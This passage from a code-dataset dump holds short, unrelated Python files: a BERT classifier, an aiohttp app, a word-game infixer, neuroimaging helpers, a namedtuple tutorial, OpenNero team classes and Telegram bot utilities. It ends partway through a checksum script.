id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
138050 | <filename>double_check/application.py
from aiohttp.web import Application
from double_check.backends.ramos import configure_ramos
from double_check.handlers import about_hanlder
from double_check.request_token.routes import ROUTES as token_routes
def create_app():
    """Build and return the configured aiohttp Application."""
    configure_ramos()
    application = Application()
    router = application.router
    router.add_routes(token_routes)
    router.add_get(r'/about', about_hanlder, name='about')
    return application
| StarcoderdataPython |
1689449 | from sklearn.model_selection import train_test_split
import pandas as pd
import re
import os
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
from tensorflow.keras import layers
from tensorflow.keras.preprocessing.sequence import pad_sequences
import bert
def bert_encode(texts, tokenizer, max_len=510):
    """Tokenize and encode raw texts into fixed-length BERT inputs.

    Each text is tokenized, wrapped in [CLS]/[SEP], truncated to max_len
    tokens (markers included) and zero-padded to exactly max_len.

    Args:
        texts: iterable of raw input strings.
        tokenizer: BERT FullTokenizer providing tokenize() and
            convert_tokens_to_ids().
        max_len: total encoded length per sample, including the two
            special tokens (BERT itself accepts at most 512).

    Returns:
        Tuple of np.ndarray (token_ids, attention_masks, segment_ids),
        each of shape (len(texts), max_len).
    """
    all_tokens = []
    all_masks = []
    all_segments = []
    for text in texts:
        word_pieces = tokenizer.tokenize(text)
        # Truncate so [CLS] + tokens + [SEP] never exceeds max_len.
        # Without this, long texts made pad_len negative and produced
        # ragged rows that np.array() could not stack.
        word_pieces = word_pieces[:max_len - 2]
        input_sequence = ["[CLS]"] + word_pieces + ["[SEP]"]
        pad_len = max_len - len(input_sequence)
        tokens = tokenizer.convert_tokens_to_ids(input_sequence) + [0] * pad_len
        pad_masks = [1] * len(input_sequence) + [0] * pad_len
        # Single-sentence input: every position belongs to segment 0.
        segment_ids = [0] * max_len
        all_tokens.append(tokens)
        all_masks.append(pad_masks)
        all_segments.append(segment_ids)
    return np.array(all_tokens), np.array(all_masks), np.array(all_segments)
def build_model(bert_layer, output_classes, max_len=512):
    """Assemble and compile a Keras classifier on top of a BERT encoder.

    Args:
        bert_layer: hub.KerasLayer wrapping a BERT encoder.
        output_classes: number of target classes; also selects the loss.
        max_len: sequence length of the three BERT input tensors.

    Returns:
        A compiled tf.keras Model taking [input_word_ids, input_mask,
        segment_ids] and emitting class probabilities.
    """
    input_word_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_word_ids")
    input_mask = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_mask")
    segment_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="segment_ids")
    pooled_output, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
    # Use the hidden state of the [CLS] token as the sentence representation.
    clf_output = sequence_output[:, 0, :]
    net = tf.keras.layers.Dense(64, activation='relu')(clf_output)
    net = tf.keras.layers.Dropout(0.2)(net)
    net = tf.keras.layers.Dense(32, activation='relu')(net)
    net = tf.keras.layers.Dropout(0.2)(net)
    out = tf.keras.layers.Dense(output_classes, activation='softmax')(net)
    # NOTE(review): with a 2-unit softmax head, 'binary_crossentropy'
    # normally expects a single sigmoid unit -- confirm the label
    # encoding/loss pairing before training.
    if output_classes == 2:
        loss = 'binary_crossentropy'
    else:
        loss = 'categorical_crossentropy'
    model = tf.keras.models.Model(inputs=[input_word_ids, input_mask, segment_ids], outputs=out)
    # 'lr' is deprecated in tf.keras optimizers; 'learning_rate' is the
    # supported keyword and behaves identically.
    model.compile(tf.keras.optimizers.Adam(learning_rate=1e-5), loss=loss, metrics=['accuracy'])
    return model
def preprocess_txt(text):
    """Strip digits/punctuation, lone letters and repeated whitespace."""
    # Keep letters only; every other character becomes a space.
    cleaned = re.sub('[^a-zA-Z]', ' ', text)
    # Drop single letters that are surrounded by whitespace.
    cleaned = re.sub(r"\s+[a-zA-Z]\s+", ' ', cleaned)
    # Collapse any run of whitespace into one space.
    return re.sub(r'\s+', ' ', cleaned)
# import data here as pandas df from csv
def load_data(f_path, preprocess=True):
    """
    Loads and preprocesses data from a CSV file into a pandas dataframe. Returns split test and train
    data as well as labels.
    f_path: file path to .csv file
    preprocess: Whether to preprocess data to remove special characters, spaces, punctuation, and numbers.
    """
    frame = pd.read_csv(f_path).drop(["Check"], axis=1).reset_index(drop=True)
    # Warn (but do not fail) if the CSV contains missing values.
    if frame.isnull().values.any():
        print("W: Null values in data!")
    sentences = np.array(frame['Sentence'])
    if preprocess:
        for idx in range(len(sentences)):
            sentences[idx] = preprocess_txt(sentences[idx])
    # Map the textual labels onto integers: left -> 0, right -> 1.
    frame['Label'] = frame['Label'].replace(['left', 'right'], [0, 1])
    return train_test_split(sentences, np.array(frame['Label']), test_size=0.1, shuffle=True)
def padded_batch_dataset(sentences, labels, batch_size):
    """Wrap (sentences, labels) in a tf.data pipeline of padded batches.

    NOTE(review): from_generator is given a lambda returning the whole
    (sentences, labels) pair at once -- confirm this yields per-sample
    elements as intended (the function is unused in this script).
    """
    sentences = tf.data.Dataset.from_generator(lambda: (sentences, labels), output_types=(tf.int32, tf.int32))
    # Pad each variable-length sequence to the longest one in its batch.
    batched_dataset = sentences.padded_batch(batch_size, padded_shapes=((None,), ()))
    return batched_dataset
# --- Script: build tokenizer, load data, train the BERT classifier ---
BertTokenizer = bert.bert_tokenization.FullTokenizer
# Frozen (trainable=False) uncased BERT-base encoder from TF-Hub.
bert_layer = hub.KerasLayer("https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/3", trainable=False)
# Recover the vocab file and casing flag shipped inside the hub module.
vocabulary_file = bert_layer.resolved_object.vocab_file.asset_path.numpy()
to_lower = bert_layer.resolved_object.do_lower_case.numpy()
tokenizer = BertTokenizer(vocabulary_file, to_lower)
# fname = os.path.join(os.getcwd(), "\\commands_dataset.csv")
fname = "F:\\Documents\\Python Scripts\\RobotVoiceCommand\\commands_dataset.csv"
train_seq, test_seq, train_lab, test_lab = load_data(fname)
# make custom model
# define hyperparameters
# NOTE(review): PAD_LENGTH is the CHARACTER length of the longest training
# sentence, not its token count -- confirm this is the intended pad size.
PAD_LENGTH = len(sorted(train_seq, key=len)[-1])
OUTPUT_CLASSES = 2
NB_EPOCHS = 30
BATCH_SIZE = 8
train_input = bert_encode(train_seq, tokenizer=tokenizer, max_len=PAD_LENGTH)
test_input = bert_encode(test_seq, tokenizer=tokenizer, max_len=PAD_LENGTH)
model = build_model(bert_layer=bert_layer, output_classes=OUTPUT_CLASSES, max_len=PAD_LENGTH)
model.summary()
# NOTE(review): labels are 0/1 integers while the head is a 2-unit
# softmax -- verify the label encoding matches the compiled loss.
history = model.fit(train_input,
                    train_lab,
                    batch_size=BATCH_SIZE,
                    epochs=NB_EPOCHS,
                    validation_split=0.2)
| StarcoderdataPython |
1655303 | <gh_stars>1-10
"""Tools for infix-based language games
Basic rules:
- <infix> is inserted after each group of consonants that is followed by a vowel
- if a word starts with a vowel, <infix> is inserted before this vowel
Extended rules:
- 'qu' is kept for syntactic purposes
"query" => "quaveravy"
- for 3+ character words, the final '-e/-es' is not infixed
"abide" => "avabavide"
- 'y' behaves as a consonant when it is followed by a vowel
"coyote" => "cavoyavote"
"""
import re
from .utils import is_consonant_or_y, is_vowel
def infix_word(word, infix):
    """Infix a single word with a given syllable.

    Walks the word character by character, applying the module's basic
    and extended rules in priority order (qu > final -e/-es > leading y
    > vowel insertion).
    """
    # pylint: disable=bad-continuation
    previous = ""
    new_word = ""
    for index, char in enumerate(word):
        # Extended rule: keep 'qu' together -- infix right after the 'u'.
        if (previous.lower(), char.lower()) == ("q", "u"):
            new_word += char + infix
        # Extended rule: in 3+ letter words, a trailing '-e'/'-es' after
        # a consonant is copied verbatim, never infixed.
        elif (
            len(word) > 2
            and word[index:].lower() in ("e", "es")
            and is_consonant_or_y(previous)
        ):
            new_word += char
        # A leading 'y' behaves as a consonant, so no infix before it.
        elif char.lower() == "y" and index == 0:
            new_word += char
        # Basic rule: insert the infix before a vowel that starts the
        # word or follows a consonant (or 'y' acting as one).
        elif is_vowel(char) and (index == 0 or is_consonant_or_y(previous)):
            if char.isupper():
                # Move the capitalisation onto the infix so the word
                # keeps a single leading capital.
                new_word += infix.capitalize() + char.lower()
            else:
                new_word += infix + char
        else:
            new_word += char
        previous = char
    return new_word
def infix_text(text, infix):
    """Infix text with a given syllable"""
    if not text:
        return ""
    # Split on whitespace, then infix each word/punctuation sub-token
    # separately so punctuation is preserved untouched.
    transformed = [
        "".join(infix_word(part, infix) for part in re.findall(r"\w+|[^\w\s]", token))
        for token in text.split()
    ]
    return " ".join(transformed)
| StarcoderdataPython |
3247124 | <gh_stars>10-100
from context import aiolearn
import getpass
# Smoke test: log into the learning platform and print the user object.
# The password is read interactively and never stored.
user = aiolearn.User(username='keh13',
                     password=getpass.getpass("input password:"))
semester = aiolearn.Semester(user)
print(user)
| StarcoderdataPython |
137656 | from neurosky._connector import Connector
from neurosky._processor import Processor
from neurosky._trainer import Trainer
from neurosky.utils import KeyHandler
# Public API re-exported at package level.
__all__ = ['Connector', 'Processor', 'Trainer', 'KeyHandler']
| StarcoderdataPython |
4816905 | # LICENSE
#
# _This file is Copyright 2018 by the Image Processing and Analysis Group (BioImage Suite Team). Dept. of Radiology & Biomedical Imaging, Yale School of Medicine._
#
# BioImage Suite Web is licensed under the Apache License, Version 2.0 (the "License");
#
# - you may not use this software except in compliance with the License.
# - You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
#
# __Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.__
#
# ENDLICENSE
import os
import sys
def getOptimizationCode(name="ConjugateGradient"):
    """Map an optimizer name (case-insensitive) to its numeric code.

    hillclimb -> 0, gradientdescent -> 1, anything else -> 2
    (conjugate gradient, the default).
    """
    codes = {"hillclimb": 0, "gradientdescent": 1}
    return codes.get(name.lower(), 2)
def getMetricCode(name="NMI"):
    """Map a similarity-metric name (case-insensitive) to its numeric code.

    SSD -> 0, CC -> 1, MI -> 2, anything else (incl. NMI) -> 3.
    """
    lookup = {"SSD": 0, "CC": 1, "MI": 2}
    return lookup.get(name.upper(), 3)
def getLinearModeCode(name="Rigid"):
    """Map a linear registration mode (case-insensitive) to its code.

    similarity -> 1, affine9 -> 2, affine -> 3, none -> -1,
    anything else (incl. rigid) -> 0.
    """
    table = {"similarity": 1, "affine9": 2, "affine": 3, "none": -1}
    return table.get(name.lower(), 0)
def resliceRegistrationOutput(libbis, reference, target, transform):
    """Reslice `target` through `transform` onto `reference`'s voxel grid."""
    ref_spacing = reference.spacing
    ref_dims = reference.dimensions
    reslice_options = {
        "spacing": [ref_spacing[0], ref_spacing[1], ref_spacing[2]],
        "dimensions": [ref_dims[0], ref_dims[1], ref_dims[2]],
        "interpolation": 1
    }
    return libbis.resliceImageWASM(target, transform, reslice_options, 0)
def getModuleDescriptionFromFile(classname):
    """Return the description dict for a bisweb module class.

    Tries the installed biswebpython package first; on ImportError,
    appends the in-tree build/native directories (relative to this
    file) to sys.path and imports the generated bismodules_desc there.
    """
    try:
        import biswebpython.lib.bismodules_desc as bismodules_desc;
    except ImportError:
        my_path=os.path.dirname(os.path.realpath(__file__));
        # Fall back to the out-of-source build location first...
        n=my_path+'/../../build/native';
        l=sys.path;
        if (n not in l):
            sys.path.append(n);
        # ...then the in-source build location.
        n=my_path+'/../build/native';
        l=sys.path;
        if (n not in l):
            sys.path.append(n);
        import bismodules_desc;
    return bismodules_desc.descriptions[classname];
def getDynamicLibraryWrapper():
    """Import and return the bisweb native library wrapper module.

    Tries the installed biswebpython package first; on ImportError,
    appends the in-tree build/native directory to sys.path and imports
    the locally built biswrapper from there.
    """
    try:
        import biswebpython.lib.biswrapper as libbis;
    except ImportError:
        my_path=os.path.dirname(os.path.realpath(__file__));
        # Fall back to the build outputs relative to this source file.
        n=my_path+'/../../build/native';
        l=sys.path;
        if (n not in l):
            sys.path.append(n);
        import biswrapper as libbis;
    return libbis;
def downloadIfNeeded(fname,basedir,tempdir):
    """Resolve basedir+fname to a local path, downloading http(s) URLs.

    Returns the local filename: for URLs, a wget download saved into
    tempdir under a flattened name ('://' -> '__', '/' -> '_');
    otherwise the concatenated basedir+fname path unchanged.
    """
    inputname=basedir+fname;
    sname=inputname;
    import wget;
    if (inputname.startswith('http')):
        # Flatten the URL into a single safe filename inside tempdir.
        f=fname.replace('://','__');
        f=f.replace('/','_');
        sname=os.path.abspath(tempdir+'/'+f);
        print('.... Downloading ',inputname,': ');
        wget.download(inputname,sname);
        print('\n');
    elif (len(basedir)>0):
        print('.... remapping ',fname,'to',sname);
    return sname;
def getDebugParam():
    """Return the standard 'debug' checkbox parameter description."""
    param = dict(
        name="Debug",
        description="Toggles debug logging",
        priority=1000,
        advanced=True,
        gui="check",
        varname="debug",
        type='boolean',
        default=False,
    )
    return param
def getRegressorInput():
    """Return the standard regressor-matrix input description."""
    # NOTE: the leading space in ' Regressor' is part of the original name.
    return dict(type='matrix',
                name=' Regressor',
                description='The regressor matrix',
                varname='regressor',
                shortname='r')
def getImageToImageInputs(desc='The image to be processed'):
    """Return the single required input-image description list."""
    entry = dict(type='image',
                 name='Input Image',
                 description=desc,
                 varname='input',
                 shortname='i',
                 required=True)
    return [entry]
def getImageToImageOutputs(desc = 'Save the output image'):
    """Return the single required output-image description list."""
    entry = dict(type='image',
                 name='Output Image',
                 description=desc,
                 varname='output',
                 shortname='o',
                 required=True,
                 extension='.nii.gz')
    return [entry]
def getMatrixToMatrixInputs(addweights = False, desc = 'The input data (matrix) to process. Rows=Frames, Columns=Series.'):
    """Return matrix-input descriptions, optionally with a weight vector."""
    inputs = [dict(
        type='matrix',
        name='Matrix',
        description=desc,
        varname='input',
        shortname='i',
        required=True,
    )]
    if addweights:
        # Optional per-frame weight vector appended after the matrix.
        inputs.append(dict(
            type='vector',
            name='Weights',
            description='(Optional). The framewise weight vector',
            varname='weight',
            shortname='w',
            required=False,
        ))
    return inputs
def getMatrixToMatrixOutputs(desc = 'The output matrix',extension='.matr'):
    """Return the single required output-matrix description list."""
    return [dict(type='matrix',
                 name='Output Matrix',
                 description=desc,
                 varname='output',
                 shortname='o',
                 required=True,
                 extension=extension)]
| StarcoderdataPython |
3205785 | import numpy as np
import matplotlib.pyplot as plt
import math
from matplotlib import cm
from mpl_toolkits.mplot3d.axes3d import Axes3D
def get_cost_function(h_theta_x, logistic=False):
    """Build a cost function J(theta) for the given hypothesis.

    With logistic=True the cross-entropy (convex) cost is used,
    otherwise the squared-error cost; both are scaled by 1/(2m).
    Each training row holds the features followed by the label.
    """
    def cost_func(thetas, training_set):
        total = 0
        for sample in training_set:
            features, y = sample[:-1], sample[-1]
            prediction = h_theta_x(thetas, features)
            if logistic:
                total += -y * math.log(prediction) - (1 - y) * math.log(1 - prediction)
            else:
                total += (prediction - y) ** 2
        return total / (2 * len(training_set))
    return cost_func
def hypothesis_linear_regression(thetas, training_sample):
    """Linear hypothesis: bias theta_0 plus the weighted feature sum."""
    bias, weights = thetas[0], thetas[1:]
    return bias + sum(training_sample * weights)
def hypothesis_logistic_regression(thetas, training_sample):
    """Logistic hypothesis: sigmoid of the linear combination."""
    linear = thetas[0] + sum(training_sample * thetas[1:])
    return 1 / (1 + np.e ** (-linear))
# --- Demo: visualise (non-)convexity of regression cost surfaces ------
# Toy training set: feature in column 0, binary label in column 1.
my_training_set = np.array([0, 1,
                            1, 0,
                            2, 1,
                            3, 0]).reshape(4, 2)
my_cost_func_linear_regression = get_cost_function(hypothesis_linear_regression)
# Squared-error cost on a sigmoid hypothesis: non-convex in theta.
my_cost_func_logistic_regression_non_convex = get_cost_function(hypothesis_logistic_regression)
# Cross-entropy cost on a sigmoid hypothesis: convex in theta.
my_cost_func_logistic_regression_convex = get_cost_function(hypothesis_logistic_regression, logistic=True)
my_thetas_lst = []
cost_lst_linear_regression = []
cost_lst_logistic_regression_non_convex = []
cost_lst_logistic_regression_convex = []
# Evaluate every cost function on a 20x20 grid of (theta_0, theta_1).
start = -10
stop = 10
step = 1
for theta_0 in np.arange(start, stop, step):
    for theta_1 in np.arange(start, stop, step):
        my_thetas_lst.append(np.array([theta_0, theta_1]))
for my_thetas in my_thetas_lst:
    cost_lst_linear_regression.append(my_cost_func_linear_regression(my_thetas, my_training_set))
    cost_lst_logistic_regression_non_convex.append(my_cost_func_logistic_regression_non_convex(my_thetas, my_training_set))
    cost_lst_logistic_regression_convex.append(my_cost_func_logistic_regression_convex(my_thetas, my_training_set))
theta_0_lst = [thetas[0] for thetas in my_thetas_lst]
theta_1_lst = [thetas[-1] for thetas in my_thetas_lst]
plt.close('all')
fig = plt.figure(figsize=(35, 23), dpi=1000)
fig.patch.set_facecolor('white')
ax = fig.add_subplot(221, projection='3d')
ax.set_title('Linear Regression Cost Function (convex)')
ax.plot_trisurf(theta_0_lst, theta_1_lst, cost_lst_linear_regression, cmap=cm.jet, linewidth=0.1)
plt.xlabel('theta 0')
plt.ylabel('theta 1')
ax = fig.add_subplot(222, projection='3d')
ax.set_title('Logistic Regression Cost Function (non-convex)')
ax.plot_trisurf(theta_0_lst, theta_1_lst, cost_lst_logistic_regression_non_convex, cmap=cm.jet, linewidth=0.1)
plt.xlabel('theta 0')
plt.ylabel('theta 1')
ax = fig.add_subplot(223, projection='3d')
# Fixed copy-paste bug: this panel plots the cross-entropy (convex) cost,
# but was previously titled '(non-convex)' like the panel above.
ax.set_title('Logistic Regression Cost Function (convex)')
ax.plot_trisurf(theta_0_lst, theta_1_lst, cost_lst_logistic_regression_convex, cmap=cm.jet, linewidth=0.1)
plt.xlabel('theta 0')
plt.ylabel('theta 1')
plt.show()
196813 | _base_ = ['./mswin_par_small_patch4_512x512_160k_ade20k_pretrain_224x224_1K.py']
# Override the inherited decode head: run it in sequential ('seq') mode.
model = dict(
    decode_head=dict(
        mode='seq',
    ))
# Larger per-GPU batch size than the base config.
data = dict(samples_per_gpu=10)
| StarcoderdataPython |
5541 | import tensorflow as tf
# Elementwise multiplier that mirrors the second coordinate of each point.
FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0])
@tf.function
def sample_data(points, labels, num_point):
    """Randomly mirror the point cloud via FLIPPING_TENSOR (p = 0.5).

    Labels are returned unchanged in both branches.
    NOTE(review): num_point is accepted but unused -- presumably a
    leftover from a point-sampling step; confirm before removing.
    """
    if tf.random.uniform(shape=()) >= 0.5:
        return points * FLIPPING_TENSOR, labels
    return points, labels
# Tiny in-memory dataset to exercise the augmentation pipeline.
mock_data = tf.constant([
    [1., 2., 3.],
    [4., 5., 6.],
    [7., 8., 9.]
])
mock_labels = tf.constant([
    [1.], [0.], [1.]
])
# Bind the (unused) num_point argument so map() sees a 2-ary function.
sampling_lambda = lambda x, y: sample_data(x, y, 512)
# Augment, then split into single-sample batches, repeated for 5 epochs.
train_data = tf.data.Dataset.from_tensors((mock_data, mock_labels)) \
    .map(sampling_lambda) \
    .unbatch() \
    .batch(1) \
    .repeat(5)
for x, y in train_data:
    print(x)
3200783 | <reponame>HembramBeta777/Python-Programming
# Find multiplication table of number n
# Reads an integer from stdin and prints its 1..10 multiplication table.
num = int(input("Enter a number: "))
for i in range(1,11):
    mul = num * i
    print(num," * ",i," = ",mul)
| StarcoderdataPython |
3397400 | <filename>build/zip.py
import zipfile
from io import BytesIO
class InMemoryZip(object):
    """Build a ZIP archive entirely in memory.

    Files are added with append(); the finished archive bytes come from
    readFromMemory() or are written to disk with writetofile().
    """

    def __init__(self):
        # Backing buffer for the archive being built.
        self.in_memory_zip = BytesIO()
        # Raw contents of entries loaded via readFromDisk().
        self.files = []

    def append(self, filename_in_zip, file_contents):
        """Add one file (name + contents) to the in-memory archive.

        Returns self so calls can be chained.
        """
        # Close the ZipFile after every append: closing writes the
        # central directory, without which the buffer is not a valid
        # ZIP archive.  Append mode lets later calls extend it.
        with zipfile.ZipFile(self.in_memory_zip, "a",
                             zipfile.ZIP_DEFLATED, False) as zf:
            zf.writestr(filename_in_zip, file_contents)
            # Mark the files as having been created on Windows so that
            # Unix permissions are not inferred as 0000.
            for zfile in zf.filelist:
                zfile.create_system = 0
        return self

    def readFromMemory(self):
        """Return the bytes of the in-memory zip archive."""
        self.in_memory_zip.seek(0)
        return self.in_memory_zip.read()

    def readFromDisk(self, url):
        """Load the contents of every entry of an on-disk zip into self.files."""
        # `with` guarantees the archive handle is released.
        with zipfile.ZipFile(url, 'r') as zf:
            for info in zf.infolist():
                self.files.append(zf.read(info.filename))

    def writetofile(self, filename):
        """Write the in-memory zip archive to a file."""
        with open(filename, "wb") as f:
            f.write(self.readFromMemory())
# * * * * * * * * * * * * * * * * * * * * * * * * * *
| StarcoderdataPython |
3228111 | ## NOTE: Requires Python 3.7 or higher
from collections import namedtuple

# Plain tuples: fields are only reachable by position.
emp1 = ('Pankaj', 35, 'Editor')
emp2 = ('David', 40, 'Author')
for p in [emp1, emp2]:
    print(p)
for p in [emp1, emp2]:
    print(p[0], 'is a', p[1], 'years old working as', p[2])
# pythonic way
for p in [emp1, emp2]:
    print('%s is a %d years old working as %s' % p)
# converting to namedtuple -- field names may be given as a list or as
# one space/comma separated string:
# Employee = namedtuple('Employee', 'name age role')
# Employee = namedtuple('Employee', 'name,age,role')
Employee = namedtuple('Employee', ['name', 'age', 'role'])
emp1 = Employee('Pankaj', 35, 'Editor')
emp2 = Employee(name='David', age=40, role='Author')
for p in [emp1, emp2]:
    print(p)
# accessing via index value (namedtuples are still tuples)
for p in [emp1, emp2]:
    print('%s is a %d years old working as %s' % p)
# accessing via name of the field
for p in [emp1, emp2]:
    print(p.name, 'is a', p.age, 'years old working as', p.role)
# namedtuple invalid keys and rename parameter -- keywords are rejected
try:
    Person = namedtuple('Person', 'def class')
except ValueError as error:
    print(error)
# rename=True will rename invalid names to index value with underscore prefix
Person = namedtuple('Person', 'name def class', rename=True)
print(Person._fields)
# namedtuple module parameter - introduced in 3.6
Person = namedtuple('Person', 'name', module='MyPersonModule')
print(Person.__module__)
# namedtuple additional methods
# _make(iterable) -- alternate constructor from any iterable
t = ('Lisa', 35, 'Contributor')
emp3 = Employee._make(t)
print(emp3)
# _asdict() -- dict preserving field order
od = emp3._asdict()
print(od)
# _replace(**kwargs) -- returns a NEW namedtuple with fields replaced
emp3 = emp3._replace(name='<NAME>', age=40)
print(emp3)
# namedtuple additional attributes
# _fields
print(emp3._fields)
# Field tuples can be concatenated to build a wider namedtuple.
Gender = namedtuple('Gender', 'gender')
Person = namedtuple('Person', Employee._fields + Gender._fields)
print(Person._fields)
# _fields_defaults - introduced in Python 3.7
# NOTE(review): spelled _field_defaults from Python 3.8 onward -- this
# attribute name is 3.7-specific; confirm the target interpreter.
# Python 3.7 removed verbose parameter and _source attribute
Person1 = namedtuple('Person1', ['name', 'age'], defaults=['Pankaj', 20])
print(Person1._fields_defaults)
# Miscellaneous examples
# getattr also works for field access
emp3_name = getattr(emp3, 'name')
print(emp3_name)
# Dict to Named Tuple -- keys must match the field names exactly
d = {'age': 10, 'name': 'pankaj', 'role':'CEO'}
emp4 = Employee(**d)
print(d)
print(emp4)
110525 | <reponame>LeRoi46/opennero
import json
import constants
import OpenNero
import agent as agents
def factory(ai, *args):
    """Instantiate the team class registered for `ai` (NeroTeam fallback)."""
    team_cls = ai_map.get(ai, NeroTeam)
    return team_cls(*args)
class TeamEncoder(json.JSONEncoder):
    """JSON encoder that serializes NeroTeam instances.

    A team becomes {'team_ai': <label>, 'agents': [{'agent_ai', 'args'}, ...]}.
    """
    def default(self, obj):
        if not isinstance(obj, NeroTeam):
            return json.JSONEncoder.default(self, obj)
        agent_specs = [
            {'agent_ai': member.ai_label(), 'args': member.args()}
            for member in obj.agents
        ]
        return {
            'team_ai': inv_ai_map.get(obj.__class__, 'none'),
            'agents': agent_specs,
        }
def as_team(team_type, dct):
    """json object_hook: rebuild a team from its serialized dict.

    Dicts without a 'team_ai' key are returned untouched.
    """
    if 'team_ai' not in dct:
        return dct
    team = factory(dct['team_ai'], team_type)
    # Cap the roster at the configured population size.
    for spec in dct['agents'][:constants.pop_size]:
        team.create_agent(spec['agent_ai'], *spec['args'])
    return team
class NeroTeam(object):
    """
    Basic NERO Team
    """

    def __init__(self, team_type):
        self.team_type = team_type
        self.color = constants.TEAM_LABELS[team_type]
        # Live roster and the pool of eliminated agents.
        self.agents = set()
        self.dead_agents = set()

    def create_agents(self, ai):
        # Fill the roster up to the configured population size.
        for _ in range(constants.pop_size):
            self.create_agent(ai)

    def create_agent(self, ai, *args):
        new_agent = agents.factory(ai, self.team_type, *args)
        self.add_agent(new_agent)
        return new_agent

    def add_agent(self, a):
        self.agents.add(a)

    def kill_agent(self, a):
        # Move the agent from the live roster to the dead pool.
        self.agents.remove(a)
        self.dead_agents.add(a)

    def is_episode_over(self, agent):
        # Base teams never end an agent's episode early.
        return False

    def reset(self, agent):
        pass

    def start_training(self):
        pass

    def stop_training(self):
        pass

    def is_destroyed(self):
        # Destroyed once every agent that ever existed has died.
        return len(self.agents) == 0 and len(self.dead_agents) > 0

    def reset_all(self):
        # Revive everyone: fold the dead back into the live roster.
        self.agents |= self.dead_agents
        self.dead_agents = set()
class RTNEATTeam(NeroTeam):
    """NERO team whose agents evolve via real-time NEAT."""

    def __init__(self, team_type):
        NeroTeam.__init__(self, team_type)
        self.pop = OpenNero.Population()
        self.rtneat = OpenNero.RTNEAT("data/ai/neat-params.dat",
                                      self.pop,
                                      constants.DEFAULT_LIFETIME_MIN,
                                      constants.DEFAULT_EVOLVE_RATE)
        # Generation counter, advanced on each epoch in reset_all().
        self.generation = 1

    def add_agent(self, a):
        NeroTeam.add_agent(self, a)
        # Keep the NEAT population in sync with the roster.
        self.pop.add_organism(a.org)

    def start_training(self):
        OpenNero.set_ai('rtneat-%s' % self.team_type, self.rtneat)

    def stop_training(self):
        OpenNero.set_ai('rtneat-%s' % self.team_type, None)

    def is_episode_over(self, agent):
        # rtNEAT marks an organism for replacement via its eliminate flag.
        return agent.org.eliminate

    def reset(self, agent):
        # Fixed typo: was 'agent.org.elminate', which raised
        # AttributeError and prevented eliminated agents from ever
        # being replaced by offspring.
        if agent.org.eliminate:
            agent.org = self.rtneat.reproduce_one()

    def reset_all(self):
        NeroTeam.reset_all(self)
        #TODO: Epoch can segfault without fitness differentials
        if any([agent.org.fitness > 0 for agent in self.agents]):
            self.generation += 1
            self.pop.epoch(self.generation)
            # Re-bind every agent to its evolved organism.
            for agent, org in zip(self.agents, self.pop.organisms):
                agent.org = org
# Registry mapping AI labels to team classes, plus the inverse used
# by TeamEncoder when serializing.
ai_map = {
    'rtneat': RTNEATTeam,
    'none': NeroTeam
}
inv_ai_map = {v: k for k, v in ai_map.items()}
| StarcoderdataPython |
180844 | import msg
def readToken():
    """Return the bot token stored on the first line of token.txt."""
    with open('token.txt', 'r') as token_file:
        return token_file.readline().strip("\n")
def hasNick(update):
    """True when the message author has a Telegram username set."""
    return update.message.from_user.username is not None
def getLinks(filename):
    """Return a numbered, blank-line-separated listing of Resources/<filename>.

    Regular files hold one link per line; the 'Books' file alternates
    name/link line pairs.  Reading stops at the first empty line.
    """
    links = ""
    count = 1
    fn = 'Resources/' + filename
    if filename != 'Books': # The Books file is the only one with a different format
        with open(fn, 'r') as f:
            l = f.readline().strip("\n")
            # An empty (or blank) line terminates the listing.
            while l:
                links += str(count) + ". " + l + "\n\n"
                count += 1
                l = f.readline().strip("\n")
    else:
        with open(fn, 'r') as f:
            # Books format: a name line followed by its link line.
            n = f.readline().strip("\n")
            l = f.readline().strip("\n")
            while n and l:
                links+= str(count) + ". " + n + "\n" + l + "\n\n"
                count += 1
                n = f.readline().strip("\n")
                l = f.readline().strip("\n")
    return links
def readAdmins():
    """Return admin chat ids from admins.txt (stops at first blank line)."""
    admins = []
    with open('admins.txt', 'r') as admin_file:
        line = admin_file.readline().strip('\n')
        while line:
            admins.append(line)
            line = admin_file.readline().strip('\n')
    return admins
def isAdmin(user_id):
    """True when user_id appears in the admins file."""
    return str(user_id) in readAdmins()
def parseLink(bot, text, option):
    """Forward a parsed report to every admin via the bot.

    option 'down' -> msg.reportDown(text); option 'new' -> msg.newLink(text).
    When the parser returns None the input is only logged to stdout.
    """
    if option == "down":
        rep = msg.reportDown(text)
        if rep != None:
            for i in readAdmins():
                bot.send_message(chat_id=i, text=rep)
        else:
            print("\t-- Bad input: " + "[" + text + "]")
    elif option == "new":
        new = msg.newLink(text)
        if new != None:
            for i in readAdmins():
                bot.send_message(chat_id=i, text=new)
        else:
            print("\t-- Bad input: " + "["+ text + "]")
def addLink(link, category):
    """Append `link` as a new line to Resources/<category>.

    File-system failures are reported via msg.wrongData instead of
    propagating, matching the bot's best-effort behaviour.
    """
    try:
        fn = 'Resources/' + category
        with open(fn, 'a') as f:
            f.write(link + '\n')
    except OSError:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt and programming errors; only file-system
        # errors are expected here.
        print(msg.wrongData)
def removeLink(link, category):
    """Delete every line equal to `link` from Resources/<category>.

    The file is read fully, filtered, and rewritten.  File-system
    failures are reported via msg.wrongData instead of propagating.
    """
    try:
        fn = 'Resources/' + category
        with open(fn, 'r') as f:
            old = f.readlines()
        # Keep every line that is not the link being removed.
        kept = [line for line in old if line.strip('\n') != link]
        with open(fn, 'w') as f:
            f.writelines(kept)
    except OSError:
        # Narrowed from a bare `except:` that hid real errors.
        print(msg.wrongData)
| StarcoderdataPython |
106297 | #!/usr/bin/python
import csv
import sys
# Spreadsheet checksum: for each tab-separated row of integers, add the
# difference between its largest and smallest value.
with open("input.txt") as tsv:
    checksum = 0
